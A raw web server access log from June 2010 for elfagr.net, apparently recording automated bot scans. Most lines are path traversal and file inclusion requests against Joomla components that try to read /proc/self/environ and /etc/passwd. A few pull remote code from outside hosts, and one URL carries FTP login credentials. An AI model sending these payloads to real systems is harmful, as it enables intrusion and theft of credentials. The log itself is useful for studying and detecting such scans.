69.163.240.58 - - [17/Jun/2010:07:25:18 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "elfagr.net"
219.255.132.83 - - [17/Jun/2010:07:25:49 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
76.12.28.37 - - [17/Jun/2010:07:26:06 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
219.255.132.83 - - [17/Jun/2010:07:26:42 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
219.255.132.83 - - [17/Jun/2010:07:26:43 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
219.255.132.83 - - [17/Jun/2010:07:26:45 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
110.45.144.106 - - [17/Jun/2010:07:26:57 -0700] "GET /logs/access.log//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
110.45.144.106 - - [17/Jun/2010:07:27:02 -0700] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
110.45.144.106 - - [17/Jun/2010:07:27:03 -0700] "GET /logs/access.log//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
110.45.144.106 - - [17/Jun/2010:07:27:08 -0700] "GET /logs//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
110.45.144.106 - - [17/Jun/2010:07:27:19 -0700] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
110.45.144.106 - - [17/Jun/2010:07:27:14 -0700] "GET /logs//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
219.255.132.83 - - [17/Jun/2010:07:28:20 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
219.255.132.83 - - [17/Jun/2010:07:28:45 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
76.12.28.37 - - [17/Jun/2010:07:29:46 -0700] "GET /index2.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
195.225.170.108 - - [17/Jun/2010:07:31:33 -0700] "GET /?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.805" "elfagr.net"
76.12.28.37 - - [17/Jun/2010:07:33:18 -0700] "GET /logs/access.log//index2.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
76.12.28.37 - - [17/Jun/2010:07:33:18 -0700] "GET /index2.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
76.12.28.37 - - [17/Jun/2010:07:33:18 -0700] "GET /logs//index2.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
110.45.144.106 - - [17/Jun/2010:07:33:29 -0700] "GET /logs/access.log/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
110.45.144.106 - - [17/Jun/2010:07:33:41 -0700] "GET /logs/access.log/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
110.45.144.106 - - [17/Jun/2010:07:33:35 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
110.45.144.106 - - [17/Jun/2010:07:33:37 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
110.45.144.106 - - [17/Jun/2010:07:33:50 -0700] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
110.45.144.106 - - [17/Jun/2010:07:33:42 -0700] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
110.45.144.106 - - [17/Jun/2010:07:34:17 -0700] "GET /logs/access.log/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
110.45.144.106 - - [17/Jun/2010:07:34:12 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
110.45.144.106 - - [17/Jun/2010:07:34:15 -0700] "GET /logs/access.log/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
110.45.144.106 - - [17/Jun/2010:07:34:28 -0700] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
110.45.144.106 - - [17/Jun/2010:07:34:21 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
110.45.144.106 - - [17/Jun/2010:07:34:36 -0700] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
110.45.144.106 - - [17/Jun/2010:07:34:44 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
110.45.144.106 - - [17/Jun/2010:07:34:40 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
202.191.112.37 - - [17/Jun/2010:07:35:57 -0700] "GET /logs/index.php/?option=com_sectionex&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
202.191.112.37 - - [17/Jun/2010:07:35:57 -0700] "GET /index.php/?option=com_sectionex&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
208.87.120.6 - - [17/Jun/2010:07:36:10 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
208.87.120.6 - - [17/Jun/2010:07:36:10 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
219.240.36.36 - - [17/Jun/2010:07:36:22 -0700] "GET /logs/access.log/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "elfagr.net"
219.240.36.36 - - [17/Jun/2010:07:36:22 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "elfagr.net"
219.240.36.36 - - [17/Jun/2010:07:36:23 -0700] "GET /logs/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "elfagr.net"
195.225.170.108 - - [17/Jun/2010:07:36:39 -0700] "GET /logs/access.log/?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
195.225.170.108 - - [17/Jun/2010:07:36:39 -0700] "GET /?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.805" "elfagr.net"
195.225.170.108 - - [17/Jun/2010:07:36:30 -0700] "GET /logs/?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5943 "-" "libwww-perl/5.805" "elfagr.net"
110.45.144.106 - - [17/Jun/2010:07:37:24 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
110.45.144.106 - - [17/Jun/2010:07:37:34 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
187.10.127.225 - - [17/Jun/2010:07:38:02 -0700] "GET /logs/access_100520.logftp:/baixe-admin:fgicad0ssn@ftp.baixe-aqui.info/httpdocs/test.php? HTTP/1.1" 404 - "-" "-" "www.elfagr.net"
187.10.127.225 - - [17/Jun/2010:07:38:14 -0700] "GET /logs/access_091126.logftp:/baixe-admin:fgicad0ssn@ftp.baixe-aqui.info/httpdocs/test.php? HTTP/1.1" 404 - "-" "-" "www.elfagr.net"
217.18.76.19 - - [17/Jun/2010:07:38:52 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "elfagr.net"
66.99.17.62 - - [17/Jun/2010:07:39:13 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
219.240.36.36 - - [17/Jun/2010:07:40:21 -0700] "GET /logs/access.log/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "elfagr.net"
219.240.36.36 - - [17/Jun/2010:07:40:23 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "elfagr.net"
219.240.36.36 - - [17/Jun/2010:07:40:24 -0700] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "elfagr.net"
76.12.28.37 - - [17/Jun/2010:07:40:54 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
76.12.28.37 - - [17/Jun/2010:07:40:44 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
76.12.28.37 - - [17/Jun/2010:07:40:44 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
81.93.240.60 - - [17/Jun/2010:07:42:46 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
208.87.120.6 - - [17/Jun/2010:07:44:01 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
208.87.120.6 - - [17/Jun/2010:07:44:01 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
208.87.120.6 - - [17/Jun/2010:07:44:11 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
208.87.120.6 - - [17/Jun/2010:07:44:51 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
208.87.120.6 - - [17/Jun/2010:07:44:41 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
208.87.120.6 - - [17/Jun/2010:07:44:51 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
203.172.211.204 - - [17/Jun/2010:07:45:19 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
217.20.125.11 - - [17/Jun/2010:07:45:29 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
174.121.243.153 - - [17/Jun/2010:07:45:43 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
217.20.125.11 - - [17/Jun/2010:07:45:47 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
174.121.243.153 - - [17/Jun/2010:07:45:49 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
174.121.243.153 - - [17/Jun/2010:07:45:53 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
174.121.243.153 - - [17/Jun/2010:07:46:28 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
208.87.120.6 - - [17/Jun/2010:07:46:33 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
208.87.120.6 - - [17/Jun/2010:07:46:23 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
208.87.120.6 - - [17/Jun/2010:07:46:23 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
219.255.132.83 - - [17/Jun/2010:07:47:44 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
219.255.132.83 - - [17/Jun/2010:07:47:45 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
219.255.132.83 - - [17/Jun/2010:07:47:45 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
208.87.120.6 - - [17/Jun/2010:07:48:27 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
208.87.120.6 - - [17/Jun/2010:07:48:17 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
208.87.120.6 - - [17/Jun/2010:07:48:18 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
195.225.170.108 - - [17/Jun/2010:07:50:22 -0700] "GET /logs/access.log/?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
195.225.170.108 - - [17/Jun/2010:07:50:33 -0700] "GET /?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.805" "elfagr.net"
195.225.170.108 - - [17/Jun/2010:07:50:23 -0700] "GET /logs/?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5943 "-" "libwww-perl/5.805" "elfagr.net"
83.16.100.218 - - [17/Jun/2010:07:53:20 -0700] "GET /components/com_mospray/scripts/admin.php?basedir=http://www.apbs.pl/images/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
83.16.100.218 - - [17/Jun/2010:07:53:20 -0700] "GET /logs//components/com_mospray/scripts/admin.php?basedir=http://www.apbs.pl/images/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
83.16.100.218 - - [17/Jun/2010:07:53:30 -0700] "GET /logs/access_091126.log//components/com_mospray/scripts/admin.php?basedir=http://www.apbs.pl/images/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
217.20.125.11 - - [17/Jun/2010:07:53:27 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
174.121.243.153 - - [17/Jun/2010:07:55:00 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
81.93.240.60 - - [17/Jun/2010:07:55:24 -0700] "GET /logs/access.log/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
81.93.240.60 - - [17/Jun/2010:07:55:25 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
81.93.240.60 - - [17/Jun/2010:07:55:25 -0700] "GET /logs/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
66.99.17.62 - - [17/Jun/2010:07:56:53 -0700] "GET /logs/access.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
66.99.17.62 - - [17/Jun/2010:07:57:03 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
66.99.17.62 - - [17/Jun/2010:07:56:53 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
217.18.76.19 - - [17/Jun/2010:07:58:55 -0700] "GET /logs/access.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "elfagr.net"
217.18.76.19 - - [17/Jun/2010:07:58:45 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "elfagr.net"
217.18.76.19 - - [17/Jun/2010:07:58:46 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "elfagr.net"
193.231.187.33 - - [17/Jun/2010:07:59:17 -0700] "GET /logs/access.log/mambots/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
193.231.187.33 - - [17/Jun/2010:07:59:18 -0700] "GET /logs/mambots/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
193.231.187.33 - - [17/Jun/2010:07:59:27 -0700] "GET /mambots/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
219.255.132.83 - - [17/Jun/2010:08:00:33 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
219.255.132.83 - - [17/Jun/2010:08:00:34 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
219.255.132.83 - - [17/Jun/2010:08:00:35 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
219.255.132.83 - - [17/Jun/2010:08:04:05 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
219.255.132.83 - - [17/Jun/2010:08:03:55 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
219.255.132.83 - - [17/Jun/2010:08:04:06 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
193.231.187.33 - - [17/Jun/2010:08:04:08 -0700] "GET /mambots/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
